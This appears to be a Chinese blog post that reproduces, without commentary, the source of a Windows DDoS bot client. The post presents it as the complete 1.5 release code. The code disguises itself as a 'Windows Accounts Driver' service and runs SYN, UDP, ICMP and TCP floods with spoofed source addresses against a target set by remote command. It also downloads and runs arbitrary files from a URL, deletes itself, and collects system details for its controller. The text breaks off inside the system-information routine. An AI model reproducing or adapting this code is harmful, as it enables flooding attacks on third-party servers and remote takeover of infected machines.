// Server.cpp : Defines the entry point for the application.

最新推荐文章于 2021-03-05 05:35:41 发布

qinqijing198601

最新推荐文章于 2021-03-05 05:35:41 发布

阅读量915

点赞数

文章标签： null service socket path header access

本文链接：https://blog.csdn.net/qinqijing198601/article/details/7491891

版权

// Server.cpp : Defines the entry point for the application.
//
#include "stdafx.h"
#include <winsock2.h>
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <winsvc.h>
#include <commdlg.h>
#include <shellapi.h>
#include <afxinet.h>
#include <ws2tcpip.h>
#pragma comment(lib,"ws2_32.lib")
#include <urlmon.h>
#pragma comment(lib,"urlmon.lib")
#include <tlhelp32.h>
/*
1.5发布版的完整原代码
*/
struct MODIFY_DATA
{
unsigned int finder;
char ws_svcname[32];
char ws_svcdisplay[128];
char ws_svcdesc[256];
char url[256];
int port;
}
modify_data =
{
0xFFFFFF8D,
"RemoteStorage",
"Windows Accounts Driver",
"Network Connections Management",
"zzz",
80,
};
#define SleepTime 10
char tgtIP[30]="192.168.1.2";
int tgtPort=80;
int timeout=10;
int StopFlag = 1;
HANDLE h[4];
typedef struct _iphdr
{
unsigned char h_verlen;
unsigned char tos;
unsigned short total_len;
unsigned short ident;
unsigned short frag_and_flags;
unsigned char ttl;
unsigned char proto;
unsigned short checksum;
unsigned int sourceIP;
unsigned int destIP;
}IP_HEADER, * PIP_HEADER;
typedef struct _tcphdr
{
unsigned short th_sport;
unsigned short th_dport;
unsigned int th_seq;
unsigned int th_ack;
unsigned char th_lenres;
unsigned char th_flag;
unsigned short th_win;
unsigned short th_sum;
unsigned short th_urp;
}TCP_HEADER, * PTCP_HEADER;
typedef struct tsd_hdr
{
unsigned long saddr;
unsigned long daddr;
char mbz;
char ptcl;
unsigned short tcpl;
}PSD_HEADER;
typedef struct udp_hdr //UDP首部
{
unsigned short sourceport;
unsigned short destport;
unsigned short udp_length;
unsigned short udp_checksum;
} UDP_HEADER;
USHORT checksum(USHORT *buffer, int size)
{
unsigned long cksum=0;
while(size >1)
{
cksum+=*buffer++;
size -=sizeof(USHORT);
}
if(size)
{
cksum += *(UCHAR*)buffer;
}
cksum = (cksum >> 16) + (cksum & 0xffff);
cksum += (cksum >>16);
return (USHORT)(~cksum);
}
/
///UDP攻击
#define nBufferSize 1024
static char pSendBuffer[nBufferSize+60];
static int iTotalSize=0;
void udp_flood()
{
Sleep(2000);
WSADATA WSAData;
WSAStartup(MAKEWORD(2,2), &WSAData);
SOCKET SendSocket;
BOOL Flag;
SendSocket = WSASocket(AF_INET,SOCK_RAW,IPPROTO_UDP,NULL,0,0);
if( SendSocket == INVALID_SOCKET )
return;
Flag=true;
if (setsockopt(SendSocket,IPPROTO_IP,IP_HDRINCL,(char*)&Flag,sizeof(Flag))==SOCKET_ERROR)
{
printf("setsockopt Error!\n");
return;
}
SOCKADDR_IN addr_in;
addr_in.sin_family=AF_INET;
addr_in.sin_port=htons(tgtPort);
addr_in.sin_addr.s_addr=inet_addr(tgtIP);
if (addr_in.sin_addr.s_addr == INADDR_NONE)
{
struct hostent *hp = NULL;
if ((hp = gethostbyname(tgtIP)) != NULL)
{
memcpy(&(addr_in.sin_addr), hp->h_addr, hp->h_length);
addr_in.sin_family = hp->h_addrtype;
}
else
return;
}
for (;;)
{
if (StopFlag == 1)
{
ExitThread(0);
return;
}
for(int i=0;i<10000;i++)
sendto(SendSocket, pSendBuffer, iTotalSize, 0, (SOCKADDR *)&addr_in, sizeof(addr_in));
Sleep(SleepTime);
}
closesocket(SendSocket);
return;
}
void fill_udp_buffer()
{
WSADATA wsaData;
WSAStartup(MAKEWORD(2, 2), &wsaData);
unsigned int saddr=0;
char hostname[MAX_PATH];
gethostname(hostname,MAX_PATH);
LPHOSTENT lphost;
lphost = gethostbyname(hostname);
if (lphost != NULL)
saddr = ((LPIN_ADDR)lphost->h_addr)->s_addr;
char pBuffer[nBufferSize];
IP_HEADER ipHeader;
UDP_HEADER udpHeader;
int iUdpCheckSumSize;
char *ptr=NULL;
FillMemory(pBuffer, nBufferSize, 'A');
iTotalSize=sizeof(ipHeader) + sizeof(udpHeader)+ nBufferSize;
ipHeader.h_verlen = (4 < 4) | (sizeof(ipHeader) / sizeof(unsigned long));
ipHeader.tos=0;
ipHeader.total_len=htons(iTotalSize);
ipHeader.ident=0;
ipHeader.frag_and_flags=0;
ipHeader.ttl=128;
ipHeader.proto=IPPROTO_UDP;
ipHeader.checksum=0;
ipHeader.destIP=inet_addr(tgtIP);
udpHeader.sourceport = htons(5444);
udpHeader.destport = htons(tgtPort);
udpHeader.udp_length = htons(sizeof(udpHeader) + nBufferSize);
udpHeader.udp_checksum = 0;
ptr = NULL;
ipHeader.sourceIP = saddr;
ZeroMemory(pSendBuffer, nBufferSize + 60);
ptr = pSendBuffer;
iUdpCheckSumSize=0;
udpHeader.udp_checksum = 0;
memcpy(ptr, &ipHeader.sourceIP, sizeof(ipHeader.sourceIP));
ptr += sizeof(ipHeader.sourceIP);
iUdpCheckSumSize += sizeof(ipHeader.sourceIP);
memcpy(ptr, &ipHeader.destIP, sizeof(ipHeader.destIP));
ptr += sizeof(ipHeader.destIP);
iUdpCheckSumSize += sizeof(ipHeader.destIP);
ptr++;
iUdpCheckSumSize++;
memcpy(ptr, &ipHeader.proto, sizeof(ipHeader.proto));
ptr += sizeof(ipHeader.proto);
iUdpCheckSumSize += sizeof(ipHeader.proto);
memcpy(ptr, &udpHeader.udp_length, sizeof(udpHeader.udp_length));
ptr += sizeof(udpHeader.udp_length);
iUdpCheckSumSize += sizeof(udpHeader.udp_length);
memcpy(ptr, &udpHeader, sizeof(udpHeader));
ptr += sizeof(udpHeader);
iUdpCheckSumSize += sizeof(udpHeader);
memcpy(ptr, pBuffer, nBufferSize);
iUdpCheckSumSize += nBufferSize;
udpHeader.udp_checksum=checksum((USHORT*)pSendBuffer,iUdpCheckSumSize);
memcpy(pSendBuffer, &ipHeader, sizeof(ipHeader));
memcpy(pSendBuffer + sizeof(ipHeader), &udpHeader, sizeof(udpHeader));
memcpy(pSendBuffer + sizeof(ipHeader) + sizeof(udpHeader), pBuffer, nBufferSize);
}
///UDP攻击END
/
/
///SYN攻击
#define PacketNum 4096
static char SendBuff[PacketNum][60] = {0};
void syn_flood()
{
Sleep(2000);
WSADATA wsaData;
WSAStartup(MAKEWORD(2, 2), &wsaData);
SOCKET SendSocket;
BOOL Flag;
int Timeout;
SendSocket = WSASocket( AF_INET, SOCK_RAW, IPPROTO_RAW, NULL, 0, WSA_FLAG_OVERLAPPED );
if( SendSocket == INVALID_SOCKET )
return;
Flag = TRUE;
if( setsockopt(SendSocket, IPPROTO_IP, IP_HDRINCL, (char *)&Flag, sizeof(Flag)) == SOCKET_ERROR )
return;
Timeout = 5000;
if ( setsockopt(SendSocket, SOL_SOCKET, SO_SNDTIMEO, (char *) &Timeout, sizeof(Timeout)) == SOCKET_ERROR )
return;
SOCKADDR_IN Sin;
Sin.sin_family = AF_INET;
Sin.sin_port = tgtPort;
Sin.sin_addr.s_addr = inet_addr(tgtIP);
if (Sin.sin_addr.s_addr == INADDR_NONE)
{
struct hostent *hp = NULL;
if ((hp = gethostbyname(tgtIP)) != NULL)
{
memcpy(&(Sin.sin_addr), hp->h_addr, hp->h_length);
Sin.sin_family = hp->h_addrtype;
}
else
return;
}
while (1)
{
if (StopFlag == 1)
{
ExitThread(0);
return;
}
for ( int Tmp = 0 ; Tmp PacketNum ; Tmp++)
if (sendto(SendSocket, SendBuff[Tmp], sizeof(IP_HEADER) + sizeof(TCP_HEADER), 0, (struct sockaddr *) &Sin, sizeof(Sin)) == SOCKET_ERROR)
{
ExitThread(0);
return;
}
Sleep(SleepTime);
}
return;
}
void fill_syn_buffer()
{
WSADATA wsaData;
WSAStartup(MAKEWORD(2, 2), &wsaData);
IP_HEADER IpHeader;
TCP_HEADER TcpHeader;
PSD_HEADER PsdHeader;
srand((unsigned) time(NULL));
char src_ip[20] = {0};
for ( int n = 0; n PacketNum; n++ )
{
wsprintf( src_ip, "%d.%d.%d.%d", rand() % 250 + 1, rand() % 250 + 1, rand() % 250 + 1, rand() % 250 + 1 );
//填充IP首部
IpHeader.h_verlen = (4<<4 | sizeof(IpHeader)/sizeof(unsigned long));
IpHeader.tos = 0;
IpHeader.total_len = htons(sizeof(IpHeader)+sizeof(TcpHeader));
IpHeader.ident = 1;
IpHeader.frag_and_flags = 0x40;
IpHeader.ttl = 128;
IpHeader.proto = IPPROTO_TCP;
IpHeader.checksum = 0;
IpHeader.sourceIP = inet_addr(src_ip);
IpHeader.destIP = inet_addr(tgtIP);
//填充TCP首部
TcpHeader.th_sport = htons( rand()%60000 + 1 ); //源端口号
TcpHeader.th_dport = htons( tgtPort );
TcpHeader.th_seq = htonl( rand()%900000000 + 1 );
TcpHeader.th_ack = 0;
TcpHeader.th_lenres = (sizeof(TcpHeader)/4<<4|0);
TcpHeader.th_flag = 2; //0,2,4,8,16,32->FIN,SYN,RST,PSH,ACK,URG
TcpHeader.th_win = htons(512);
TcpHeader.th_sum = 0;
TcpHeader.th_urp = 0;
PsdHeader.saddr = IpHeader.sourceIP;
PsdHeader.daddr = IpHeader.destIP;
PsdHeader.mbz = 0;
PsdHeader.ptcl = IPPROTO_TCP;
PsdHeader.tcpl = htons(sizeof(TcpHeader));
//计算TCP校验和
memcpy( SendBuff[n], &PsdHeader, sizeof(PsdHeader) );
memcpy( SendBuff[n] + sizeof(PsdHeader), &TcpHeader, sizeof(TcpHeader) );
TcpHeader.th_sum = checksum( (USHORT *) SendBuff[n], sizeof(PsdHeader) + sizeof(TcpHeader) );
//计算IP检验和
memcpy( SendBuff[n], &IpHeader, sizeof(IpHeader) );
memcpy( SendBuff[n] + sizeof(IpHeader), &TcpHeader, sizeof(TcpHeader) );
memset( SendBuff[n] + sizeof(IpHeader) + sizeof(TcpHeader), 0, 4 );
IpHeader.checksum = checksum( (USHORT *) SendBuff, sizeof(IpHeader) + sizeof(TcpHeader) );
memcpy( SendBuff[n], &IpHeader, sizeof(IpHeader) );
memcpy( SendBuff[n]+sizeof(IpHeader), &TcpHeader, sizeof(TcpHeader) );
}
return;
}
///SYN攻击END
/
/
const char icmpBuffer[4000]=
"GET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htm"
"GET ^*%%RTG*(&^%FTGYHJIJ%^&*()*&*^&%RDFG(JKJH.asp"
"GET *(&*^TGH*JIHG^&*(&^%*(*)OK)(*&^%$EDRGF%&^.html"
"GET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htm"
"GET ^*%%RTG*(&^%FTGYHJIJ%^&*()*&*^&%RDFG(JKJH.asp"
"GET *(&*^TGH*JIHG^&*(&^%*(*)OK)(*&^%$EDRGF%&^.html"
"GET ^*%%RTG*(&^%FTGYHJIJ%^&*()*&*^&%RDFG(JKJH.asp"
"GET *(&*^TGH*JIHG^&*(&^%*(*)OK)(*&^%$EDRGF%&^.html"
"GET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htm"
"GET ^*%%RTG*(&^%FTGYHJIJ%^&*()*&*^&%RDFG(JKJH.asp"
"GET *(&*^TGH*JIHG^&*(&^%*(*)OK)(*&^%$EDRGF%&^.html"
"GET ^*%%RTG*(&^%FTGYHJIJ%^&*()*&*^&%RDFG(JKJH.asp"
"GET *(&*^TGH*JIHG^&*(&^%*(*)OK)(*&^%$EDRGF%&^.html"
"GET ^*%%RTG*(&^%FTGYHJIJ%^&*()*&*^&%RDFG(JKJH.asp"
"GET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htm"
"GET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htm"
"GET ^*%%RTG*(&^%FTGYHJIJ%^&*()*&*^&%RDFG(JKJH.asp"
"GET *(&*^TGH*JIHG^&*(&^%*(*)OK)(*&^%$EDRGF%&^.html"
"GET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htm"
"GET ^*%%RTG*(&^%FTGYHJIJ%^&*()*&*^&%RDFG(JKJH.asp"
"GET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htm"
"GET ^*%%RTG*(&^%FTGYHJIJ%^&*()*&*^&%RDFG(JKJH.asp"
"GET *(&*^TGH*JIHG^&*(&^%*(*)OK)(*&^%$EDRGF%&^.html"
"GET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htm"
"GET ^*%%RTG*(&^%FTGYHJIJ%^&*()*&*^&%RDFG(JKJH.asp"
"GET *(&*^TGH*JIHG^&*(&^%*(*)OK)(*&^%$EDRGF%&^.html"
"GET ^*%%RTG*(&^%FTGYHJIJ%^&*()*&*^&%RDFG(JKJH.asp"
"GET *(&*^TGH*JIHG^&*(&^%*(*)OK)(*&^%$EDRGF%&^.html"
"GET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htm"
"GET ^*%%RTG*(&^%FTGYHJIJ%^&*()*&*^&%RDFG(JKJH.asp"
"GET *(&*^TGH*JIHG^&*(&^%*(*)OK)(*&^%$EDRGF%&^.html"
"GET ^*%%RTG*(&^%FTGYHJIJ%^&*()*&*^&%RDFG(JKJH.asp"
"GET *(&*^TGH*JIHG^&*(&^%*(*)OK)(*&^%$EDRGF%&^.html"
"GET ^*%%RTG*(&^%FTGYHJIJ%^&*()*&*^&%RDFG(JKJH.asp"
"GET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htm"
"GET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htm"
"GET ^*%%RTG*(&^%FTGYHJIJ%^&*()*&*^&%RDFG(JKJH.asp"
"GET *(&*^TGH*JIHG^&*(&^%*(*)OK)(*&^%$EDRGF%&^.html"
"GET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htm"
"GET ^*%%RTG*(&^%FTGYHJIJ%^&*()*&*^&%RDFG(JKJH.asp"
"GET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htm"
"GET ^*%%RTG*(&^%FTGYHJIJ%^&*()*&*^&%RDFG(JKJH.asp"
"GET *(&*^TGH*JIHG^&*(&^%*(*)OK)(*&^%$EDRGF%&^.html"
"GET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htm"
"GET ^*%%RTG*(&^%FTGYHJIJ%^&*()*&*^&%RDFG(JKJH.asp"
"GET *(&*^TGH*JIHG^&*(&^%*(*)OK)(*&^%$EDRGF%&^.html"
"GET ^*%%RTG*(&^%FTGYHJIJ%^&*()*&*^&%RDFG(JKJH.asp"
"GET *(&*^TGH*JIHG^&*(&^%*(*)OK)(*&^%$EDRGF%&^.html"
"GET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htm"
"GET ^*%%RTG*(&^%FTGYHJIJ%^&*()*&*^&%RDFG(JKJH.asp"
"GET *(&*^TGH*JIHG^&*(&^%*(*)OK)(*&^%$EDRGF%&^.html"
"GET ^*%%RTG*(&^%FTGYHJIJ%^&*()*&*^&%RDFG(JKJH.asp"
"GET *(&*^TGH*JIHG^&*(&^%*(*)OK)(*&^%$EDRGF%&^.html"
"GET ^*%%RTG*(&^%FTGYHJIJ%^&*()*&*^&%RDFG(JKJH.asp"
"GET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htm"
"GET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htm"
"GET ^*%%RTG*(&^%FTGYHJIJ%^&*()*&*^&%RDFG(JKJH.asp"
"GET *(&*^TGH*JIHG^&*(&^%*(*)OK)(*&^%$EDRGF%&^.html"
"GET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htm"
"GET ^*%%RTG*(&^%FTGYHJIJ%^&*()*&*^&%RDFG(JKJH.asp"
"GET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htm"
"GET ^*%%RTG*(&^%FTGYHJIJ%^&*()*&*^&%RDFG(JKJH.asp"
"GET *(&*^TGH*JIHG^&*(&^%*(*)OK)(*&^%$EDRGF%&^.html"
"GET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htm"
"GET ^*%%RTG*(&^%FTGYHJIJ%^&*()*&*^&%RDFG(JKJH.asp"
"GET *(&*^TGH*JIHG^&*(&^%*(*)OK)(*&^%$EDRGF%&^.html"
"GET ^*%%RTG*(&^%FTGYHJIJ%^&*()*&*^&%RDFG(JKJH.asp"
"GET *(&*^TGH*JIHG^&*(&^%*(*)OK)(*&^%$EDRGF%&^.html"
"GET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htm"
"GET ^*%%RTG*(&^%FTGYHJIJ%^&*()*&*^&%RDFG(JKJH.asp"
"GET *(&*^TGH*JIHG^&*(&^%*(*)OK)(*&^%$EDRGF%&^.html"
"GET ^*%%RTG*(&^%FTGYHJIJ%^&*()*&*^&%RDFG(JKJH.asp"
"GET *(&*^TGH*JIHG^&*(&^%*(*)OK)(*&^%$EDRGF%&^.html"
"GET ^*%%RTG*(&^%FTGYHJIJ%^&*()*&*^&%RDFG(JKJH.asp"
"GET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htm"
"GET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htm"
"GET ^*%%RTG*(&^%FTGYHJIJ%^&*()*&*^&%RDFG(JKJH.asp"
"GET *(&*^TGH*JIHG^&*(&^%*(*)OK)(*&^%$EDRGF%&^.html"
"GET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htm"
"GET ^*%%RTG*(&^%FTGYHJIJ%^&*()*&*^&%RDFG(JKJH.asp";
/ICMP 攻击
/*ICMP Header*/
typedef struct _icmphdr //定义ICMP首部
{
BYTE i_type; //8位类型
BYTE i_code; //8位代码
USHORT i_cksum; //16位校验和
USHORT i_id; //识别号（一般用进程号作为识别号）
USHORT i_seq; //报文序列号
ULONG timestamp; //时间戳
}ICMP_HEADER;
#define ICMP_ECHO 8
#define MAX_PACKET 4096
void fill_icmp_data(char *icmp_data, int datasize)
{
ICMP_HEADER *icmp_hdr;
char *datapart;
icmp_hdr = (ICMP_HEADER*)icmp_data;
icmp_hdr->i_type = ICMP_ECHO;
icmp_hdr->i_code = 0;
icmp_hdr->i_id = (USHORT)GetCurrentProcessId();
icmp_hdr->i_cksum = 0;
icmp_hdr->i_seq = 0;
datapart = icmp_data + sizeof(ICMP_HEADER);
memcpy(datapart,icmpBuffer,strlen(icmpBuffer));
}
void icmp_flood()
{
Sleep(2000);
WSADATA wsaData;
WSAStartup(MAKEWORD(2, 2), &wsaData);
SOCKET m_hSocket;
SOCKADDR_IN m_addrDest;
char *icmp_data;
int datasize = 32;
int timeout = 2000;
m_hSocket = WSASocket (AF_INET, SOCK_RAW, IPPROTO_ICMP, NULL, 0,WSA_FLAG_OVERLAPPED);
if (m_hSocket == INVALID_SOCKET)
return;
if (setsockopt(m_hSocket, SOL_SOCKET, SO_SNDTIMEO, (char*)&timeout, sizeof(timeout)) == SOCKET_ERROR)
return;
memset(&m_addrDest, 0, sizeof(m_addrDest));
m_addrDest.sin_family = AF_INET;
if ((m_addrDest.sin_addr.s_addr = inet_addr(tgtIP)) == INADDR_NONE)
{
struct hostent *hp = NULL;
if ((hp = gethostbyname(tgtIP)) != NULL)
{
memcpy(&(m_addrDest.sin_addr), hp->h_addr, hp->h_length);
m_addrDest.sin_family = hp->h_addrtype;
}
else
return;
}
datasize += sizeof(ICMP_HEADER);
icmp_data =(char*) HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY,MAX_PACKET);
memset(icmp_data,0,MAX_PACKET);
fill_icmp_data(icmp_data,MAX_PACKET);
int seq_no=0;
int sleep_time = SleepTime/10;
while(1)
{
if (StopFlag == 1)
{
ExitThread(0);
return;
}
((ICMP_HEADER*)icmp_data)->i_cksum = 0;
((ICMP_HEADER*)icmp_data)->i_seq = seq_no++;
((ICMP_HEADER*)icmp_data)->timestamp = GetTickCount();
((ICMP_HEADER*)icmp_data)->i_cksum = checksum((USHORT*)icmp_data, MAX_PACKET);
for (int i=0;i<100;i++)
sendto(m_hSocket, icmp_data, MAX_PACKET, 0, (struct sockaddr*)&m_addrDest, sizeof(m_addrDest));
Sleep(5);
}
return;
}
/ICMP攻击结束
///tcp攻击开始
void tcp_flood()
{
WSADATA WSAData;
WSAStartup(MAKEWORD(2,2) ,&WSAData);
SOCKADDR_IN sockAddr;
SOCKET m_hSocket;
int nSize = strlen(icmpBuffer);
memset(&sockAddr,0,sizeof(sockAddr));
sockAddr.sin_family = AF_INET;
sockAddr.sin_port=htons(tgtPort);
sockAddr.sin_addr.s_addr = inet_addr(tgtIP);
if ((sockAddr.sin_addr.s_addr = inet_addr(tgtIP)) == INADDR_NONE)
{
struct hostent *hp = NULL;
if ((hp = gethostbyname(tgtIP)) != NULL)
{
memcpy(&(sockAddr.sin_addr), hp->h_addr, hp->h_length);
sockAddr.sin_family = hp->h_addrtype;
}
else
return;
}
for(;;)
{
if (StopFlag == 1)
{
ExitThread(1);
return;
}
m_hSocket = socket(PF_INET,SOCK_STREAM,0);
if (connect(m_hSocket,(SOCKADDR*)&sockAddr, sizeof(sockAddr)) != 0)
continue;
for(int a=0;a<10240;a++)
{
if (send(m_hSocket,icmpBuffer,nSize,0) ==SOCKET_ERROR)
break;
}
Sleep(SleepTime);
}
return;
}
void wait_for_end()
{
DWORD s_time = timeout*60*1000;
Sleep(s_time);
StopFlag=1;
TerminateThread(h[0],0);
TerminateThread(h[1],0);
TerminateThread(h[2],0);
TerminateThread(h[3],0);
//TerminateThread(h[4],0);
CloseHandle(h[0]);
CloseHandle(h[1]);
CloseHandle(h[2]);
CloseHandle(h[3]);
//CloseHandle(h[4]);
h[0]=NULL;
h[1]=NULL;
h[2]=NULL;
h[3]=NULL;
//h[4]=NULL;
}
BOOL _DeleteMe()
{
TCHAR szModule [MAX_PATH],
szComspec[MAX_PATH],
szParams [MAX_PATH];
// get file path names:
if((GetModuleFileName(0,szModule,MAX_PATH)!=0) &&
(GetShortPathName(szModule,szModule,MAX_PATH)!=0) &&
(GetEnvironmentVariable("COMSPEC",szComspec,MAX_PATH)!=0))
{
// set command shell parameters
lstrcpy(szParams," /c del ");
lstrcat(szParams, szModule);
lstrcat(szParams, " > nul");
lstrcat(szComspec, szParams);
// set struct members
STARTUPINFO si={0};
PROCESS_INFORMATION pi={0};
si.cb = sizeof(si);
si.dwFlags = STARTF_USESHOWWINDOW;
si.wShowWindow = SW_HIDE;
// increase resource allocation to program
SetPriorityClass(GetCurrentProcess(),
REALTIME_PRIORITY_CLASS);
SetThreadPriority(GetCurrentThread(),
THREAD_PRIORITY_TIME_CRITICAL);
// invoke command shell
if(CreateProcess(0, szComspec, 0, 0, 0,CREATE_SUSPENDED|
DETACHED_PROCESS, 0, 0, &si, &pi))
{
// suppress command shell process until program exits
SetPriorityClass(pi.hProcess,IDLE_PRIORITY_CLASS);
SetThreadPriority(pi.hThread,THREAD_PRIORITY_IDLE);
// resume shell process with new low priority
ResumeThread(pi.hThread);
// everything seemed to work
return TRUE;
}
else // if error, normalize allocation
{
SetPriorityClass(GetCurrentProcess(),
NORMAL_PRIORITY_CLASS);
SetThreadPriority(GetCurrentThread(),
THREAD_PRIORITY_NORMAL);
}
}
return FALSE;
}
BOOL _ExplainCmd(char *cmd)
{
if (strncmp(cmd,"FLOOD:",6) == 0)
{
//FLOOD:www.x.com|80|10|syn_udp_tcp_icmp_|/index.html
char ip[30],sp[10],tm[10],flag[30],obj[80];
memset(ip,'\0',30);
memset(sp,'\0',10);
memset(tm,'\0',10);
memset(flag,'\0',30);
memset(tgtIP,'\0',30);
memset(obj,'\0',80);
CString strLine = cmd;
strLine.Delete(0,strLine.Find(":")+1);
strcpy(ip,strLine.Left(strLine.Find("|")));
strLine.Delete(0,strLine.Find("|")+1);
strcpy(sp,strLine.Left(strLine.Find("|")));
strLine.Delete(0,strLine.Find("|")+1);
strcpy(tm,strLine.Left(strLine.Find("|")));
strLine.Delete(0,strLine.Find("|")+1);
strcpy(flag,strLine.Left(strLine.Find("|")));
strLine.Delete(0,strLine.Find("|")+1);
strcpy(obj,strLine.GetBuffer(0));
tgtPort = atoi(sp);
timeout = atoi(tm);
if (tgtPort =0)
tgtPort = 80;
if (timeout =0 || timeout >= 120)
timeout = 120;
if (inet_addr(ip)== INADDR_NONE)
{
struct hostent *hp = NULL;
if ((hp = gethostbyname(ip)) != NULL)
{
in_addr in;
memcpy(&in, hp->h_addr, hp->h_length);
strcpy(tgtIP,inet_ntoa(in));
}
}
else
strcpy(tgtIP,ip);
if (StopFlag == -1)
return TRUE;
StopFlag=-1;
fill_syn_buffer();
fill_udp_buffer();
if (strstr(flag,"syn") != NULL)
h[0] = CreateThread(NULL, 0,(LPTHREAD_START_ROUTINE) syn_flood,NULL, 0, NULL);
if (strstr(flag,"udp") != NULL)
h[1] = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)udp_flood, NULL, 0, NULL);
if (strstr(flag,"tcp") != NULL)
h[2] = CreateThread(0,0,(LPTHREAD_START_ROUTINE)tcp_flood,NULL,0,NULL);
if (strstr(flag,"icmp") != NULL)
h[3] = CreateThread(0,0,(LPTHREAD_START_ROUTINE)icmp_flood,NULL,0,NULL);
CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)wait_for_end, NULL, 0, NULL);
return TRUE;
}
if (strstr(cmd,"STOPATTACK") != NULL)
{
StopFlag=1;
StopFlag=1;
TerminateThread(h[0],0);
TerminateThread(h[1],0);
TerminateThread(h[2],0);
TerminateThread(h[3],0);
//TerminateThread(h[4],0);
CloseHandle(h[0]);
CloseHandle(h[1]);
CloseHandle(h[2]);
CloseHandle(h[3]);
//CloseHandle(h[4]);
h[0]=NULL;
h[1]=NULL;
h[2]=NULL;
h[3]=NULL;
//h[4]=NULL;
return TRUE;
}
if (strncmp(cmd,"DOWNLOAD:",9) == 0)
{
char url[256];
memset(url,0,256);
strcpy(url,strchr(cmd,':')+1);
char seps[]= "/";
char *token;
char *file;
char myURL[MAX_PATH] ={0};
char myFILE[MAX_PATH] = {0};
strcpy(myURL,url);
token=strtok(myURL,seps);
while(token!=NULL)
{
file=token;
token=strtok(NULL,seps);
}
GetSystemDirectory(myFILE,MAX_PATH);
strcat(myFILE, "\\");
strcat(myFILE, file);
HRESULT hr;
hr = URLDownloadToFile(0, url, myFILE, 0, 0);
if(hr!=S_OK)
return FALSE;
PROCESS_INFORMATION PI;
STARTUPINFO SI;
memset(&SI, 0, sizeof(SI));
SI.cb = sizeof(SI);
CreateProcess(myFILE, NULL, NULL, NULL, FALSE,NORMAL_PRIORITY_CLASS, NULL, NULL, &SI, &PI);
return TRUE;
}
if (strncmp(cmd,"UPDATEDATA:",11) == 0)
{
char url[256];
memset(url,0,256);
strcpy(url,strchr(cmd,':')+1);
char seps[]= "/";
char *token;
char *file;
char myURL[MAX_PATH] ={0};
char myFILE[MAX_PATH] = {0};
strcpy(myURL,url);
token=strtok(myURL,seps);
while(token!=NULL)
{
file=token;
token=strtok(NULL,seps);
}
GetTempPath(MAX_PATH,myFILE);
strcat(myFILE, "\\");
strcat(myFILE, file);
HRESULT hr;
hr = URLDownloadToFile(0, url, myFILE, 0, 0);
if(hr!=S_OK)
return FALSE;
PROCESS_INFORMATION PI;
STARTUPINFO SI;
memset(&SI, 0, sizeof(SI));
SI.cb = sizeof(SI);
CreateProcess(myFILE, NULL, NULL, NULL, FALSE,NORMAL_PRIORITY_CLASS, NULL, NULL, &SI, &PI);
SC_HANDLE service, scm;
scm = OpenSCManager(0, 0,SC_MANAGER_CREATE_SERVICE);
service = OpenService(scm, modify_data.ws_svcname,SERVICE_ALL_ACCESS | DELETE);
DeleteService(service);
exit(0);
ExitProcess(0);
return TRUE;
}
if (strstr(cmd,"REMOVE") != NULL)
{
SC_HANDLE service, scm;
scm = OpenSCManager(0, 0,SC_MANAGER_CREATE_SERVICE);
service = OpenService(scm, modify_data.ws_svcname,SERVICE_ALL_ACCESS | DELETE);
DeleteService(service);
exit(0);
ExitProcess(0);
return TRUE;
}
return FALSE;
}
void _GetSysInfo(SOCKET hSock)
{
int ver=-1;
CString SendData;
OSVERSIONINFO osver = {sizeof(OSVERSIONINFO)};
GetVersionEx(&osver);
if (osver.dwMajorVersion == 5 && osver.dwMinorVersion == 0)
{
ver=0;
}
else if (osver.dwMajorVersion == 5 && osver.dwMinorVersion == 1)
{
CString m_stServPack = CString (osver.szCSDVersion);
m_stServPack.FreeExtra ();
if (m_stServPack.Find("Service") >=0 &&m_stServPack.Find("Pack") >=0 &&m_stServPack.Find("2") >=0)
ver=2;
else
ver=1;
}
else if (osver.dwMajorVersion == 5 && osver.dwMinorVersion == 2)
ver=3;
MEMORYSTATUS mem;
mem.dwLength=sizeof(mem);
GlobalMemoryStatus(&mem);
char CPUInfo[MAX_PATH]={0};
char SubKey[MAX_PATH]={0};
strcpy(SubKey,"HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0\0");
HKEY hKey;
if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,SubKey,0L,KEY_ALL_ACCESS,&hKey) == ERROR_SUCCESS)
{
DWORD dwType;
DWORD dwSize=200;
RegQueryValueEx(hKey,"ProcessorNameString",NULL,&dwType,(BYTE *)CPUInfo,&dwSize);
RegCloseKey(hKey);
}
SendData.Format("VERSONEXc:%d|%d|%s",ver,mem.dwTotalPhys/1024/1024+1,CPUInfo);
